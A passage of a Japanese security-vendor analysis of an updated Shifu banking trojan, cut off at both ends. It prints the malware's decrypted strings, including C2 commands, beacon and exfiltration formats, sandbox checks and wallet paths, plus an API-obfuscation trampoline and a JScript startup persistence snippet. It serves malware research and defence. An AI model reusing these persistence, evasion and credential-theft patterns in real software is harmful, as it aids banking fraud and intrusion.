\u30d5\u30a1\u30a4\u30eb\u304c\u4f5c\u6210\u3055\u308c\u3001%TEMP%\u30d5\u30a9\u30eb\u30c0\u3067\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u5143\u306e\u5b9f\u884c\u6e08\u307f\u306e\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u3092\u30e9\u30f3\u30c0\u30e0\u306a\u30d0\u30a4\u30c8\u6570\u3067\u4e0a\u66f8\u304d\u3059\u308b\u3053\u3068\u3067\u3001\u305d\u306e\u75d5\u8de1\u304c\u96a0\u853d\u3055\u308c\u307e\u3059\u3002\u30e9\u30f3\u30c0\u30e0\u306a\u30d0\u30a4\u30c8\u306e\u5f8c\u306b\u306f\u3001\u5e38\u306b\u30b9\u30da\u30fc\u30b9\u6587\u5b57\u3068CR LF\u5236\u5fa1\u6587\u5b57\u304c\u7d9a\u304d\u307e\u3059\u3002<\/p>\n<h4>\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u5206\u6790<\/h4>\n<p style=\"font-weight: 400;\">\u9759\u7684\u5206\u6790\u3092\u3088\u308a\u56f0\u96e3\u306b\u3059\u308b\u305f\u3081\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9 
\u30e2\u30b8\u30e5\u30fc\u30eb\u306eIAT\u95a2\u6570\u540d\u3068\u93750xFF\u3068\u306eXOR\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002.data\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u3042\u308b\u6709\u610f\u7fa9\u306a\u6587\u5b57\u5217\u3068\u93750x8D\u3068\u306eXOR\u3082\u5b9f\u884c\u3055\u308c\u3001\u5373\u5ea7\u306b\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">AddMandatoryAce\r\nADVAPI\r\nAdvapi32.dlladvapi32.dllws2_32.dll\r\nWPUCloseEvent\r\nWPUCloseSocketHandleWPUCreateEvent\r\nWPUCreateSocketHandle\r\nWPUFDIsSet\r\nWPUGetProviderPath\r\nWPUModifyIFSHandle\r\nWPUPostMessage\r\nWPUQueryBlockingCallbackWPUQuerySocketHandleContext\r\nWPUQueueApc\r\nWPUResetEvent\r\nWPUSetEvent\r\nWPUOpenCurrentThreadWPUCloseThread\r\nWSPStartup\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/echo \r\n &gt; %1\\r\\ndel %0\r\nrundll32.exe shell32.dll, ShellExec_RunDLL %s\r\nsoftware\\\\microsoft\\\\windows\\\\currentversion\\\\run\r\nMicrosoft\\\\Microsoft AntimalwareSoftware\\\\Coranti\r\nSoftware\\\\risingSoftware\\\\TrendMicroSoftware\\\\Symantec\r\nSoftware\\\\ComodoGroup\r\nSoftware\\\\Network Associates\\\\TVD\r\nSoftware\\\\Data Fellows\\\\F-SecureSoftware\\\\Eset\\\\Nod\r\nSoftware\\\\Softed\\\\ViGUARD\r\nSoftware\\\\Zone Labs\\\\ZoneAlarm\r\nSoftware\\\\Avg\r\nSoftware\\\\VBA32\r\nSoftware\\\\Doctor WebSoftware\\\\G DataSoftware\\\\Avira\r\nSoftware\\\\AVAST Software\\\\Avast\r\nSoftware\\\\KasperskyLab\\\\protected\r\nSoftware\\\\Bitdefender\r\nSoftware\\\\Panda SoftwareSoftware\\\\Sophos.bat|$$$}rstuvwxyz{$$$$$$$&gt;?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\\\]^_`abcdefghijklmnop\r\nq\r\n\\\\\\\\.\\\\%C:\r\nconhost\r\nCreateProcessInternalW\r\nConvertStringSecurityDescriptorToSecurityDescriptorWContent-Type: application\/x-www-form-urlencoded\\r\\n\r\nContent-Type: multipart\/form-data; 
boundary=---------------------------%s\\r\\n\r\nHost: %s\\r\\n%d.%d.%d.%d\r\n%d.%d.%d.%d.%x\r\n%temp%\\\\debug_file.txt\r\n[%u][%s:%s:%u][0x%x;0x%x] %sDnsFlushResolverCache\r\n\\\\*.*\r\ndnsapi.dll\r\nDnsGetCacheDataTable.dll.exedownload.windowsupdate.com\r\nvk.com\r\nyandex.ru\r\nHTTP\/1.1https:\/\/http:\/\/%s\r\nIsWow64Process\r\nkernel\r\nkernel32.dllLdrGetProcedureAddress\r\nMicrosoft\r\nNtAllocateVirtualMemory\r\nCLOSED\r\nLAST_ACKTIME_WAIT\r\nDELETE_TCB\r\nLISTEN\r\nSYN_SENTSYN_RCVDESTAB\r\nFIN_WAIT1\r\nFIN_WAIT2\r\nCLOSE_WAIT\r\nCLOSING\r\nTCP\\t%s:%d\\t%s:%d\\t%s\\n\r\nnetstat\\nProto\\tLocal address\\tRemote address\\tState\\n\r\nntdll.dll\r\nNtResumeProcess\r\nNtSuspendProcess\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\drivers\\\\null.sys\r\nNtWriteVirtualMemoryopenRegisterApplicationRestart\r\nRtlCreateUserThread\r\nResetSR\r\nRtlComputeCrc32\r\nrundll32SeDebugPrivilegeSystemDrive\r\n\\\\StringFileInfo\\\\%04x%04x\\\\ProductName\r\nsoftware\\\\microsoft\\\\windows nt\\\\currentversion\\\\winlogon\r\nshell\r\nSleep\r\nsrclient.dllSeShutdownPrivilege\r\n\\\"%s\\\"\r\n%d\\t%s\\ntaskmgr\\nPID\\tProcess name\\nnet user\\n\r\nthe computer is joined to a 
domain\\n..\r\n\\\\VarFileInfo\\\\Translation\r\n%windir%\\\\system32\\\\%windir%\\\\syswow64\\\\POST*.exe\r\n%SystemDrive%\\\\\r\n*SYSTEM*%02x%s:Zone.Identifier\r\nGetProcessUserModeExceptionPolicy\r\nSetProcessUserModeExceptionPolicy\r\n%ws\\\\%ws\\n\r\nWORKGROUP\r\nHOMEsoftware\\\\microsoft\\\\windowsSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\ExplorerDisableCurrentUserRun\r\n%s.dat\r\n%OS%_%NUMBER_OF_PROCESSORS%\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)(A;;GA;;;AC)\r\n\\\\\\\\.\\\\AVGIDSShim\r\nFFD3\\\\\\\\.\\\\NPF_NdisWanIpc:\\\\sample\\\\pos.exe\r\nANALYSERS\r\nSANDBOX\r\nVIRUS\r\nMALWARE\r\nFORTINETMALNETVMc:\\\\analysis\\\\sandboxstarter.exec:\\\\analysisc:\\\\insidetmc:\\\\windows\\\\system32\\\\drivers\\\\vmmouse.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vmhgfs.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vboxmouse.sys\r\nc:\\\\iDEFENSEc:\\\\popupkiller.exe\r\nc:\\\\tools\\\\execute.exe\r\nc:\\\\Perlc:\\\\Python27api_log.dll\r\ndir_watch.dll\r\npstorec.dll\r\ndbghelp.dll\r\nProcess32NextW\r\n1406Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\r\n.bitMiniDumpWriteDump\r\n\\r\\nReferer: %s\\r\\n\r\n\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\r\nvar %s = new ActiveXObject(\"WScript.Shell\"); 
%s.Run(\"%s\");\r\nGenuineIntelAuthenticAMDCentaurHauls7z\r\nfnbqooqdaixfueangywblgabirdgvkewdyqgfqaioluesyrpryfkjerfsouemaxnavrkguxmcmhckwprunurmhehclermtufwiyjbqhwlunbun\r\nuumeowfjmerxppxrgaxukyx\r\nPowerManager_M5VKII_%d\r\n[type=ftp]\\n[botid=%s]\\n[proc=%s]\\n[data=%s]\\n\r\n[type=pop3]\\n[botid=%s]\\n[proc=%s]\\n[data=%s]\\n\r\n%OS%_%NUMBER_OF_PROCESSORS%\r\n[type=post]\\n[botid=%s]\\n[url=%s]\\n[ua=%s]\\n[proc=%s]\\n[ref=%s]\\n[keys=%s]\\n[data=%s]\\n\r\nname=%s&amp;ok=%s&amp;id=%d&amp;res_code=%d&amp;res_text=%s_%x\r\nname=%s&amp;ok=%s&amp;id=%d&amp;res_code=%d&amp;res_text=%s\r\nbotid=%s&amp;ver=%s.%u&amp;up=%u&amp;os=%u&amp;ltime=%s%d&amp;token=%d&amp;cn=%s&amp;av=%s&amp;dmn=%s&amp;mitm=%u\r\njava.exe|javaw.exe|plugin-container.exe|acrobat.exe|acrod32.exe\r\ntellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jack \r\nhenry|cruisenet|gplusmain|silverlake|v48d0250s1Root|TrustedPeople|SMS|Remote Desktop|REQUEST\r\nTREASURE|BUH|BANK|ACCOUNT|CASH|FINAN|MONEY|MANAGE|OPER|DIRECT|ROSPIL|CAPO|BOSS|TRADEactive_bc\r\n-----------------------------%s\\r\\nContent-Disposition: form-data; name=\\\"pcname\\\"\\r\\n\\r\\n%s!%s\\r\\n-----------------------------\r\n%s\\r\\nContent-Disposition: form-data; name=\\\"file\\\"; filename=\\\"report\\\"\\r\\nContent-Type: text\/plain\\r\\n\\r\\n%s\\r\\n--------------\r\n---------------%s--\\r\\n\r\n%domain%deactivebc\r\ninject\r\nkill_os\r\nloadactive_sk\r\ndeactive_sk\r\nwipe_cookiesmitm_modmitm_script\r\nmitm_geterr\r\nget_keylog\r\nget_sols!active_bc\\[(\\d+)\\] (\\S+) (\\d+)\r\n!deactive_bc\\[(\\d+)\\]\r\n!inject\\[(\\d+)\\] (\\S+)\r\n!kill_os\\[(\\d+)\\]\r\n!get_keylog\\[(\\d+)\\]!load\\[(\\d+)\\] (\\S+)!update\\[(\\d+)\\] (\\S+)\r\n!wipe_cookies\\[(\\d+)\\]\r\n!active_sk\\[(\\d+)\\] (\\S+) (\\d+)\r\n!deactive_sk\\[(\\d+)\\]\r\n!mitm_mod\\[(\\d+)\\] (\\S+) (\\d+) (\\S+)!mitm_script\\[(\\d+)\\] 
(\\S+)\r\n!mitm_geterr\\[(\\d+)\\]\r\n!get_sols\\[(\\d+)\\]\r\nATCASH\r\nATLOCAL\r\nCERTCERTX\r\nCOLVCRAIF\r\nCRYPT\r\nCTERM\r\nSCREEN\r\nINTER\r\nELBALOCAL\r\nELBAWEB\r\nELBAWEB\r\nELBAWEB\r\nPUTTY\r\nVNCVIEW\r\nMCLOCAL\r\nMCSIGN\r\nOPENVPN\r\nPIPEK\r\nPIPEK\r\nPIPEK\r\nPIPEK\r\nPOSTSAP\r\nchrome.dll\r\nmxwebkit.dlldragon_s.dlliron.dllvivaldi.dll\r\nnspr4.dll\r\nnss3.dllbrowser.dll\r\nAdvapi32.dllrsaenh.dll\r\nkernel32.dllIprivLibEx.dll\r\ncryptui.dll\r\ncrypt32.dll\r\nntdll.dll\r\nssleay32.dllurlmon.dll\r\nuser32.dll\r\nWininet.dll\r\nWs2_32.dll\r\nPSAPI.dll\r\nNzBrco.dll\r\nVirtualProtect\r\nLoadLibraryExW\r\nZwQuerySystemInformationWSARecv\r\nWSASend\r\nZwDeviceIoControlFile\r\nURLDownloadToCacheFileW\r\nURLDownloadToFileW\r\nTranslateMessageSSL_get_fd\r\nSSL_write\r\nPFXImportCertStore\r\nCryptEncryptCPExportKey\r\nCreateProcessInternalW\r\nCreateDialogParamW\r\nGetClipboardDatagetaddrinfo\r\ngethostbyname\r\nGetAddrInfoExW\r\nGetMessageA\r\nGetMessageW\r\nDeleteFileA\r\nGetModuleBaseNameW\r\nbad port value\r\ncan't find plug-in path\r\ncan't get bot path\r\ncan't download file\r\ncan't encrypt file\r\ncan't save inject config to filecan't get temp file\r\nfile is not valid PEcan't delete original file\r\ncan't replace original file\r\ncan't close handle\r\ncan't protect file\r\noriginal file not found\r\ncan't execute file\r\ncan't create directory\r\ncan't unzip file #1\r\ncan't unzip file #2\r\nmitm_mod is inactivehttpd.exe is anactive\r\nmicrosoft.com\r\ndropbox.com\r\nKEYGRAB\r\nPasswordTELEMACOScelta e Login dispositivo\r\nTLQ Web\r\ndb Corporate Banking WebSecureStoreCSP - enter PIN\r\ngoogle.com\r\nSoftware\\\\SimonTatham\\\\PuTTYreg.txt\r\nSoftware\\\\Microsoft\\\\Internet Explorer\\\\MainTabProcGrowth\r\nTemp\\\\Low\r\n crc32[%x]\r\nACCT \r\nAUTHINFO PASS \r\nAUTHINFO USER 
\r\nAuthorization\r\n:BA:[bks]\r\n%X!%X!%08X\r\nbtc_path.txtbtc_wallet.dat\r\nbitcoin\\\\wallet.dat\r\n%s%s\\\\%u_cert.pfx\r\ncmdline.txt\r\n1.3.6.1.5.5.7.3.3\r\nCodeSign\\n\r\nSoftware\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\r\n[del]\r\nDefault\r\n.exeELBA5\\\\ELBA_dataftp:\/\/anonymous:ftp:\/\/%s:%s@%s:%d\\n\r\nHBPData\\\\hbp.profileHH:mm:ssdd:MMM:yyyy\r\nI_CryptUIProtect\\\\exe\\\\\r\ninfected.exx%s%s\\\\%u_info.txt\r\n[ins]\r\nInstallDate\r\n%02u.jpg%s\\\\%02d.jpgKEYLOG\r\n%s\\\\keylog.txt\r\n[TOKEN ON]\r\n\\n\\n[%s (%s-%s) - %s (%s)]\\n[pst]%s[\/pst]\r\nltcd_path.txt\r\nltcd_wallet.dat\r\nlitecoind\\\\wallet.dat\r\nltc_path.txtltc_wallet.dat\r\nlitecoin\\\\wallet.dat\\\\MacromediaMultiCash@Sign\r\nC:\\\\Omikron\\\\MCSign\r\n[ML][MR]Global\\\\{4C470E-%08x-%08x-%08x}\r\nGlobal\\\\{DAN6J0-%s}\r\nnoneopera.exe\r\nPASS \r\npassword.txt\\\\\\\\.\\\\pipe\\\\%s\r\npop3:\/\/%s:%s@%s:%d\\n%PROCESSOR_ARCHITECTURE%Referer\r\n[ret]\r\n%08x\\\\system32\\\\rstrui.exe\r\n\\\\scrs\\\\send%s%s%s%d%s:%s\r\nsysinfo.txt\r\n[tab]\r\ndata.txt&lt;unnamed&gt;\r\n&lt;untitled&gt;\r\nupdate\r\nUSER \r\nUser-agent\r\nvkeys\r\n%x\\r\\n\r\n\\r\\n%x%x%x.tmp\r\n\\\\*.txt\r\n%02x%2b\r\ntorrent\r\n-config config.vnc\r\n--config \r\nconfig.ovpn\r\ndata.txt[type=post]\\n\r\nCreateFileW\r\npos.exe\r\nbank.exePOS\r\nsecure.\r\n.mozgoogle.com\r\nCertVerifyCertificateChainPolicyCertGetCertificateChain\r\nSSL_AuthCertificateHook\r\nUSERNAMESoftware\\\\ESET\\\\ESET 
Security\\\\CurrentVersion\\\\Info\r\nC8FFAD27AE1BBE28BE24DDF20AF36EF901C609968930ED82CEFBC64808BA34102C4FABA0560523FB4CCBF33684F77C8401DFB\r\n3A7D2D598E872DD78033E7F900B78A0C710CDF0941662FF7745A435D4BC18D5661E0582B21B2DB8FCA1C0CA3401D0FC9F051\r\n85A558AB6A76A010F606CD77B35A480B6B7176F0903299B91F1BBD141B4D33615849C35557357DAB819BC3D4A8722BB433DE\r\nB66C7A326BE859BD94930331B37DEE6EF4C475EA4B33DE4699FFDBCD34E196E19FE630E631D2C612705048620183BCF56709B\r\n484A4380C4B00D8D94D131C31DB53AE6BCDCCC14131BAC99A68C59A604D0AE9116E9196F7FA3EA5F86F67E9B175CC09D3E17\r\n997728B7D\r\n10001\r\nget=1\r\nCOMPNAMEAppDataDir\r\nupdfiles\\\\upd.ver\r\nupdfiles\\\\lastupd.ver\r\nSYSTEM\\\\CurrentControlSet\\\\services\\\\Avg\\\\SystemValues\r\nLocal AppData\r\nAvg2015\r\nAvg2014\r\nAvg2013\r\nAvg2012\r\nAvg2011\r\nupdate\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\explorer\\\\Browser Helper Objects\\\\{8CA7E745-EF75-4E7B-BB86-\r\n8065C0CE29CA}\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\explorer\\\\Browser Helper Objects\\\\{BB62FFF4-41CB-4AFC-BB8C-\r\n2A4D4B42BBDC}\r\nSoftware\\\\Microsoft\\\\Internet Explorer\\\\MainEnable Browser Extensions\r\nhttpd.exe\r\n%s\\\\httpd.exe\r\nconnect\r\ndata\\\\index.php\r\nlogs\\\\error.log\r\nerror.log\r\n&lt;?\\n';\\n$bot_id = '\r\n$bot_net = '$key_log_file = '\r\n$process_file = '\r\n127.0.0.1\r\nListen 
%s:%u\\n\r\nconf\\\\httpd.confSSL_PORT%u&gt;\\n\r\n[type=post]\\n\r\n[type=screen]\\n\r\n[type=knock]\\n\r\n74??834E0440B832FFFFFF\r\n74??834E04405F5EB832FFFFFF\r\nDEBUG\r\nmemory.dmp\r\nconfig.xml\r\nphp5ts.dll\r\nzend_stream_fixup\r\nzend_compile_file\r\nindex.php\r\nconfig.php\r\ncontent.php\r\niexplore.exe|firefox.exe|chrome.exe|opera.exe|browser.exe|dragon.exe|epic.exe|sbrender.exe|vivaldi.exe|maxthon.exe|ybr\r\nowser.exe|microsoftedgecp.exe\r\nInternetQueryDataAvailable\r\nInternetReadFileInternetReadFileExA\r\nInternetReadFileExW\r\nInternetSetStatusCallbackA\r\nInternetSetStatusCallbackW\r\nHttpSendRequestAHttpSendRequestExA\r\nHttpSendRequestExW\r\nHttpSendRequestW\\r\\n0\\r\\n\\r\\n\r\n.rdata\r\n\\r\\n\\r\\nHTTP\/1.\r\nTransfer-Encoding\r\nchunked\r\nContent-Length\r\nclose\r\nProxy-ConnectionHostAccept-Encoding\r\nx-xss-protectionx-content-security-policy\r\nx-frame-options\r\nx-content-type-options\r\nIf-Modified-Since\r\nIf-None-Match\r\ncontent-security-policy\r\nx-webkit-cspConnection\r\nhttp:\/\/\r\nhttps:\/\/NSS layer\r\nContent-TypeBasic \r\nPR_ClosePR_Connect\r\nPR_GetNameForIdentity\r\nPR_Read\r\nPR_SetError\r\nPR_WriteReferer: \r\nAccept-Encoding:\\r\\n1406SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\r\ndata_after\\ndata_before\\n\r\ndata_enddata_inject\\n\r\nset_url %BOTID%\r\n%BOTNET%InternetCloseHandle\r\nHTMLc:\\\\inject.txt\r\nDalvik\/1.6.0 (Linux; U; Android 4.1.2; GT-N7000 Build\/JZO54K)\r\nxxx_process_0x%08x\r\nCommon.js\r\n<\/pre>\n<h4>API\u306e\u96e3\u8aad\u5316<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001<a href=\"https:\/\/www.symantec.com\/content\/en\/us\/enterprise\/media\/security_response\/whitepapers\/a_museum_of_api_obfuscation_on_win32.pdf\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: 
\">Push-Calc-Ret\u96e3\u8aad\u5316<\/a>\u3068\u3057\u3066\u77e5\u3089\u308c\u308bAPI\u306e\u96e3\u8aad\u5316\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304csvchost\u30d7\u30ed\u30bb\u30b9\u306b\u633f\u5165\u3055\u308c\u305f\u5f8c\u3001\u5b9f\u969b\u306eAPI\u95a2\u6570\u3078\u306e\u547c\u3073\u51fa\u3057\u306f\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u3088\u3063\u3066\u30d1\u30c3\u30c1\u9069\u7528\u3055\u308c\u307e\u3059\u3002Windows API\u95a2\u6570\u3092\u547c\u3073\u51fa\u3059\u5fc5\u8981\u304c\u751f\u3058\u308b\u305f\u3073\u306b\u3001\u5b9f\u969b\u306e\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u3092\u8a08\u7b97\u3059\u308b\u30c8\u30e9\u30f3\u30dd\u30ea\u30f3\u95a2\u6570\u304c\u4ee3\u308f\u308a\u306b\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002\u30c8\u30e9\u30f3\u30dd\u30ea\u30f3\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u306f\u3059\u3079\u3066\u3001\u30e1\u30e2\u30ea\u5185\u306e\u914d\u5217\u306b\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u305f\u3068\u3048\u3070\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304cCreateFile()\u3092\u547c\u3073\u51fa\u3059\u969b\u306b\u3001\u3053\u306e\u547c\u3073\u51fa\u3057\u306b\u5bfe\u3057\u3066\u30d1\u30c3\u30c1\u304c\u9069\u7528\u3055\u308c\u305f\u3068\u3057\u307e\u3059\u3002\u305d\u306e\u5834\u5408\u3001\u6b21\u306e\u3088\u3046\u306a\u30c8\u30e9\u30f3\u30dd\u30ea\u30f3\u95a2\u6570\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">00846110   PUSH 2B464C25\r\n00846115   PUSHFD\r\n00846116   XOR DWORD PTR SS:[ESP+4], 5DB5E13F\r\n0084611E   POPFD\r\n0084611F   RETN\r\n<\/pre>\n<p style=\"font-weight: 
400;\">\u6700\u521d\u306b\u3001\u3042\u308b\u5024\u304c\u30b9\u30bf\u30c3\u30af\u306b\u30d7\u30c3\u30b7\u30e5\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001EFLAGS\u30ec\u30b8\u30b9\u30bf\u304c\u30b9\u30bf\u30c3\u30af\u306b\u4fdd\u5b58\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30ec\u30b8\u30b9\u30bf\u306f\u5f8c\u7d9a\u306eXOR\u547d\u4ee4\u306b\u3088\u3063\u3066\u5909\u66f4\u3055\u308c\u308b\u304b\u3089\u3067\u3059(OF\u3001CF\u30d5\u30e9\u30b0\u306f\u30af\u30ea\u30a2\u3055\u308c\u3001SF\u3001ZF\u3001PF\u30d5\u30e9\u30b0\u306f\u7d50\u679c\u306b\u5fdc\u3058\u3066\u8a2d\u5b9a\u3055\u308c\u307e\u3059)\u3002\u7d9a\u3044\u3066\u3001\u4ee5\u524d\u306b\u30d7\u30c3\u30b7\u30e5\u3057\u305f\u5024\u3068\u5225\u306e\u5024\u3068\u306eXOR\u304c\u5b9f\u884c\u3055\u308c\u3001\u5b9f\u969b\u306eAPI\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u304c\u8a08\u7b97\u3055\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001EFLAGS\u30ec\u30b8\u30b9\u30bf\u304c\u5fa9\u5143\u3055\u308c\u3001RETN\u547d\u4ee4\u3092\u4ecb\u3057\u3066\u5b9f\u969b\u306eAPI\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<h4>\u6301\u7d9a\u624b\u6cd5<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6700\u521d\u306e\u96e3\u8aad\u5316\u6e08\u307f\u30ed\u30fc\u30c0\u30fc \u30d5\u30a1\u30a4\u30eb\u3092%ProgramData%\u30d5\u30a9\u30eb\u30c0\u306b\u30b3\u30d4\u30fc\u3057\u307e\u3059\u3002\u305d\u306e\u969b\u306b\u3001GetTickCount()\u3092\u4f7f\u7528\u3057\u3066\u30e9\u30f3\u30c0\u30e0 
\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u751f\u6210\u3057\u307e\u3059\u3002\u7d9a\u3044\u3066\u3001\u73fe\u5728\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u8d77\u52d5\u30d5\u30a9\u30eb\u30c0\u306b\u3001\u201cCommon.js\u201d\u3068\u3044\u3046\u540d\u524d\u306eJScript\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u518d\u8d77\u52d5\u5f8c\u306b\u6700\u521d\u306e\u30ed\u30fc\u30c0\u30fc\u3092\u5b9f\u884c\u3059\u308b\u6b21\u306e\u30b3\u30fc\u30c9\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">var yqvltidpue = new ActiveXObject(\"WScript.Shell\");\r\nyqvltidpue.Run(\"C:\\\\PROGRA~3\\\\930d4a6d.exe\")\r\n<\/pre>\n<h4>\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u6bd4\u8f03\u3057\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u66f4\u65b0<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306e\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u95a2\u3059\u308b\u30ec\u30dd\u30fc\u30c8\u306f\u3001<a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2015\/10\/shifu-malware-analyzed-behavior-capabilities-and.html\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">FireEye<\/a>\u3068<a href=\"https:\/\/www.virusbulletin.com\/virusbulletin\/2015\/11\/shifu-rise-self-destructive-banking-trojan\/\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">Fortinet<\/a>\u304c\u767a\u884c\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u6bd4\u3079\u3066\u3001\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3001\u30e6\u30fc\u30b6\u30fc\u540d\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u65e5\u3001\u30b7\u30b9\u30c6\u30e0 \u30c9\u30e9\u30a4\u30d6 \u30dc\u30ea\u30e5\u30fc\u30e0 
\u30b7\u30ea\u30a2\u30eb\u756a\u53f7\u3092\u4f7f\u7528\u3057\u3066\u4f5c\u6210\u3055\u308c\u308b\u6587\u5b57\u5217\u306e\u3001\u30b9\u30ad\u30e3\u30f3\u5bfe\u8c61\u3067\u3042\u308b\u90e8\u5206\u6587\u5b57\u5217\u306e\u30ea\u30b9\u30c8\u306f\u9577\u304f\u306a\u308a\u307e\u3057\u305f\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">TREASURE<\/li>\n<li style=\"font-weight: 400;\">BUH<\/li>\n<li style=\"font-weight: 400;\">BANK<\/li>\n<li style=\"font-weight: 400;\">ACCOUNT<\/li>\n<li style=\"font-weight: 400;\">CASH<\/li>\n<li style=\"font-weight: 400;\">FINAN<\/li>\n<li style=\"font-weight: 400;\">MONEY<\/li>\n<li style=\"font-weight: 400;\">MANAGE<\/li>\n<li style=\"font-weight: 400;\">OPER<\/li>\n<li style=\"font-weight: 400;\">DIRECT<\/li>\n<li style=\"font-weight: 400;\">ROSPIL<\/li>\n<li style=\"font-weight: 400;\">CAPO<\/li>\n<li style=\"font-weight: 400;\">BOSS<\/li>\n<li style=\"font-weight: 400;\">TRADE<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u66f4\u65b0\u3055\u308c\u305f\u30b3\u30de\u30f3\u30c9 \u30ea\u30b9\u30c8:<\/p>\n<ul>\n<li style=\"font-weight: 400;\">active_sk<\/li>\n<li style=\"font-weight: 400;\">deactive_sk<\/li>\n<li style=\"font-weight: 400;\">deactivebc<\/li>\n<li style=\"font-weight: 400;\">get_keylog<\/li>\n<li style=\"font-weight: 400;\">get_sols<\/li>\n<li style=\"font-weight: 400;\">inject<\/li>\n<li style=\"font-weight: 400;\">kill_os<\/li>\n<li style=\"font-weight: 400;\">load<\/li>\n<li style=\"font-weight: 400;\">mitm_geterr<\/li>\n<li style=\"font-weight: 400;\">mitm_mod<\/li>\n<li style=\"font-weight: 400;\">mitm_script<\/li>\n<li style=\"font-weight: 400;\">wipe_cookies<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6a19\u7684\u3068\u306a\u308b\u30d6\u30e9\u30a6\u30b6\u306e\u66f4\u65b0\u3055\u308c\u305f\u30ea\u30b9\u30c8:<\/p>\n<ul>\n<li style=\"font-weight: 400;\">iexplore.exe<\/li>\n<li style=\"font-weight: 400;\">firefox.exe<\/li>\n<li style=\"font-weight: 400;\">chrome.exe<\/li>\n<li style=\"font-weight: 
400;\">opera.exe<\/li>\n<li style=\"font-weight: 400;\">browser.exe<\/li>\n<li style=\"font-weight: 400;\">dragon.exe<\/li>\n<li style=\"font-weight: 400;\">epic.exe<\/li>\n<li style=\"font-weight: 400;\">sbrender.exe<\/li>\n<li style=\"font-weight: 400;\">vivaldi.exe<\/li>\n<li style=\"font-weight: 400;\">maxthon.exe<\/li>\n<li style=\"font-weight: 400;\">ybrowser.exe<\/li>\n<li style=\"font-weight: 400;\">microsoftedgecp.exe<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3044\u305a\u308c\u304b\u306eC&amp;C\u30b5\u30fc\u30d0\u304b\u3089Apache httpd.exe\u30b5\u30fc\u30d0 